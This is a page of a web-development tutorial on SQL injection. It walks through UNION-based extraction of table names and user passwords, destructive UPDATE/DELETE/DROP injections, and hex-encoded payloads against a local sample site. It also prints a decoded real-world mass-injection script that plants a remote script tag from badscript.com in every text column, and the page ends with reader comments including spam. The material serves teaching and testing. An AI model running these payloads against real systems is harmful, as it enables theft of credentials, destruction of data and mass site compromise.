SQL Injection and Cross-Site Scripting
page 4 of 9
by Bryian Tan
Feedback
Average Rating: This article has not yet been rated.
Views (Total / Last 10 Days): 46993/ 58

Query string

SQL Injection

Definition: Insertion of a SQL query via the input data from the client to the application that are later passed to an instance of SQL Server for parsing and execution.

 

UNION SQL Injection

We will use the UNION statement to mine all the table names in the database. The two consecutive hyphens "--" indicates the SQL comments.  See below, the comments are in bold color, the query statement after the hyphens will not evaluated by the SQL server.

Listing 1

SELECT * FROM dbo.MyComments WHERE ID = 1 --ORDER BY [Name]

Execute the URL shown below.

Listing 2

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL FROM 
INFORMATION_SCHEMA.TABLES--

It will yield the results "All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists." This error message emerges if we try to run a UNION, INTERSECT or EXCEPT query that has not an equal number of expressions in their SELECT list sections. The work around is to keep adding the NULL expression in the URL until the error message disappears.

Listing 3

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, NULL FROM 
INFORMATION_SCHEMA.TABLES--
…
http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, NULL, 
NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES--

The error message will disappears if the query has equal number of expression in the UNION query. Next, try to replace each of the NULL value with TABLE_NAME. If you get an error message, leave it NULL.

Listing 4

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, 
TABLE_NAME, TABLE_NAME, TABLE_NAME, TABLE_NAME, NULL, NULL FROM 
INFORMATION_SCHEMA.TABLES--

Results

Figure 2

From the output displayed above, we know that the database contains several tables namely MyComments, tbl_SQLInjection, tbl_users and TestTable. Next, we will extract every columns name in tbl_users table. Execute the URL shown in listing 5.

 

Listing 5

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL,
COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, NULL, NULL FROM 
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'tbl_users'--

Result

Figure 3

 

From the output displayed above, we witnessed that the tbl_users contains address, password, phone, secret, secret2 and username columns. To confirms that, shown below is the snapshot of tbl_users table schema from the SQL server.

Figure 4

 

Repeat the same step with different table name.

Listing 6

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, 
COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, NULL, NULL FROM 
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'MyComments'--
…

Let retrieve the data stored in tbl_users table. The %2b and %27 are the URL encoding of the "+" and "'" character respectively. Execute the URL shown below.

Listing 7

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL,
username%2B %27 - %27%2Bpassword, secret %2B %27 - %27 %2B secret2, address, 
phone %2B %27 - %27 %2Baddress, NULL, NULL FROM tbl_users--

Results

Figure 5

To confirms that, shown below is the snapshot of tbl_users table contents. Repeat the same step for the rest of the tables.

Figure 6

Retrieve Data from sysprocesses Table

We also can retrieve the SQL server instance name, login name, database name, SQL server version, and etc… from the master..sysprocesses table. Execute the URL below and observe the output.

Listing 8

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION 
SELECT NULL, DB_Name([dbid]) %2B  CHAR(0x2d) %2B  loginame, net_address, 
hostname %2B  CHAR(0x2d) %2B  %40%40ServerName, %40%40version, NULL, NULL 
FROM master..sysprocesses--

UPDATE the table

Listing 9

http://localhost:1234/Sample/ListComments.aspx?cid=1 
UPDATE tbl_Users SET Password = 'HACKED' WHERE username ='test@test.com' --

Result

Figure 7

 

DELETE the data in the table

Listing 10

http://localhost:1234/Sample/ListComments.aspx?cid=99999 
DELETE FROM tbl_Users WHERE username ='test@test.com' --

TRUNCATE the table

Listing 11

http://localhost:1234/Sample/ListComments.aspx?cid=99999 
TRUNCATE TABLE tbl_Users --

DROP the table

Listing 12

http://localhost:1234/Sample/ListComments.aspx?cid=99999 DROP TABLE tbl_Users --

Hex based SQL injection

Once in a while, we will see some strange entries as listed below in the server log file.

 

Listing 13

http://www.YourDomain.com/SomePage.asp?id=1&cat=c 
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(4445434c415245204054207661726368617228
323535292c4043207661726368617228343030302920da4445434c415245205461626c655f43757273
6f7220435552534f5220464f5220da73656c65637420612e6e616d652c622e6e616d652066726f6d20
7379736f626a6563747320612c737973636f6c756d6e73206220da776865726520612e69643d622e69
6420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e7874
7970653d3335206f7220622e78747970653d323331206f7220622e78747970653d3136372920da4f50
454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f4375
72736f7220494e544f2040542c4043205748494c452840404645…

Which when decoded to string will becomes (PLEASE DO NOT COPY AND RUN THIS QUERY)

Listing 14

DECLARE @T varchar(255),@C varchar(4000) 
DECLARE Table_Cursor CURSOR FOR 
select a.name,b.name from sysobjects a,syscolumnswhere a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or 
b.xtype=167) 
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) 
BEGIN 
exec('update ['+@T+'] set ['+@C+']=''"></title><script 
src="http://badscript.com/bad.js"> </script><!--''+['+@C+'] where '+@C+' not like 
''%"></title><script src="http://badscript.com/bad.js"></script><!--''')
FETCH NEXT FROM  
Table_Cursor INTO @T,@C END CLOSE 
Table_Cursor DEALLOCATE Table_Cursor

The above query will find all the text columns in the table of each database and append a malicious script to it.

Example

Shown below is a URL with a query string to retrieve comment from the SQL server by comment id.

http://localhost:1234/Sample/ListComments.aspx?cid=1

For the sake of simplicity, I'm using a simple update statement to update the table. The "UPDATE dbo.MyComments SET test='HACKED'" query will look like the following in hexadecimal:

0x5550444154452064626f2e4d79436f6d6d656e74732053455420746573743d274841434b454427

The %3b is the URL encoding of the ";" character. Append the string to the URL. See below.

Listing 15

http://localhost:1234/Sample/ListComments.aspx?cid=1  DECLARE @S VARCHAR(255) 
SET 
@s=CAST(0x5550444154452064626f2e4d79436f6d6d656e74732053455420746573743d274841434b
454427 AS VARCHAR(255))  exec (@s)--

Or

http://localhost:1234/Sample/ListComments.aspx?cid=1%3BDECLARE @S VARCHAR(255)SET 
@s=CAST(0x5550444154452064626f2e4d79436f6d6d656e74732053455420746573743d274841434b
454427 AS VARCHAR(255)) exec (@s)--

Before executing the above URL

Figure 8

 

After executing the above URL

Figure 9

 

Quick test

Append the below string to your web pages URL that take parameters.

Listing 16

http://localhost:1234/Sample/ListComments.aspx?cid=1 DECLARE @S VARCHAR(500) 
SET @s= 
CAST(0x4946204f424a4543545f4944282774626c5f53514c496e6a656374696f6e272c27552729204
953204e554c4c20435245415445205441424c452064626f2e5b74626c5f53514c496e6a656374696f6
e5d285b4f75747075745d205b766172636861725d2835303029204e554c4c2920494e5345525420494
e544f2064626f2e74626c5f53514c496e6a656374696f6e2053454c454354202770616765202d20537
5626a65637420746f2053514c20496e6a656374696f6e27 as VARCHAR(500))Exec(@s)--

If the URL parameter value is not an integer, try appending '; or '); or; in front of the DECLARE keyword. See below for an example.

Listing 17

; DECLARE @S VARCHAR(500) SET @s= 
CAST(0x4946204f424a4543545f4944282774626c5f53514c496e6a656374696f6e272c27552729204
953204e554c4c20435245415445205441424c452064626f2e5b74626c5f53514c496e6a656374696f6
e5d285b4f75747075745d205b766172636861725d2835303029204e554c4c2920494e5345525420494
e544f2064626f2e74626c5f53514c496e6a656374696f6e2053454c454354202770616765202d20537
5626a65637420746f2053514c20496e6a656374696f6e27 as VARCHAR(500))Exec(@s)--
…

Then, execute this query "SELECT * FROM dbo.tbl_SQLInjection" in SQL Server Management Studio. If you see the results similar to the one shown below, then the web page is subjected to Hex based SQL Injection. Repeat the above step for the rest of the web pages.

Figure 10

If the URL parameter value is not an integer, try appending '; or '); or ; in front of the query.


View Entire Article

User Comments

Title: NIKE NFL jerseys   
Name: NIKE NFL jerseys
Date: 2012-07-02 10:09:59 AM
Comment:
http://www.jersey2shop.com
http://www.cheapjersey2store.com
http://www.jerseycaptain.com
http://www.yourjerseyhome.com
We are professional jerseys manufacturer from china,wholesal.cheap nike nfl jerseys, mlb jerseys, nhl jerseys,nba jerseys and shoes
Cheap NFL,NBA,MLB,NHL
,heap jerseys,2012 nike nfl Jerseys,nba jersey and shorts,oklahoma city thunder jersey,official jeremy lin new york knicks jersey,NFL Jerseys Wholesale,blake griffin jersey blue,NFL jerseys For Sale online.All Our Jerseys Are Sewn On and Directly From Chinese Jerseys Factory
,Wholesale cheap jerseys,Cheap mlb jerseys,]Nike NFL Jerseys,Cheap China Wholesae,Wholesale jerseys From China,2012 nike nfl Jerseys,Jerseys From China,,2012 nike nfl Jerseys,Revolution 30 nba jerseys,jersey of nba chicago bulls direk rose ,nfl jerseys,green bay packers jerseys wholesale,Buffalo Bills nike nfl jerseys sale,good supplier soccer jerseys,cool base mlb jerseys,Revolution 30 nba jerseys,2012 stanley cup nhl jersey,
We are professional jerseys manufacturer from china,wholesal.cheap nike nfl jerseys, mlb jerseys, nhl jerseys,nba jerseys and shoes. www.yourjerseyhome.com
Title: SQL Injection and Cross-Site Scripting   
Name: DINESH
Date: 2011-01-18 6:25:25 AM
Comment:
The best SQL Server Site Scripting
Title: avrail   
Name: Refat Eid
Date: 2010-09-19 3:02:00 AM
Comment:
where can i found the TestDBSetup.sql ?
Title: Really Good   
Name: Ankit Shivankar
Date: 2010-09-15 1:04:32 AM
Comment:
its really good.....and easy to understand

dear Bryian ...
M facing some problem in my personal project can u help me..
if u can then plz contact me on mail id that is shiva.ankit@gmail.com
Title: Download Link   
Name: Bryian Tan
Date: 2010-09-14 8:21:24 PM
Comment:
Hello,

Sorry, I think I forgot to include the download link. Anyway, please download the sample code from here http://download.ysatech.com/SQL-Injection-and-Cross-Site-Scripting/Sample_SQLInjection_XSS.zip
Title: Gustavo   
Name: Fernandez
Date: 2010-09-14 3:19:45 PM
Comment:
Where is the link to download the code sample (TestDBSetup.sql)?
Title: Senior programmer/analyst   
Name: Greg Hilsheimer
Date: 2010-09-14 2:16:39 PM
Comment:
where is link to download code






Community Advice: ASP | SQL | XML | Regular Expressions | Windows


©Copyright 1998-2024 ASPAlliance.com  |  Page Processed at 2024-03-28 9:33:48 PM  AspAlliance Recent Articles RSS Feed
About ASPAlliance | Newsgroups | Advertise | Authors | Email Lists | Feedback | Link To Us | Privacy | Search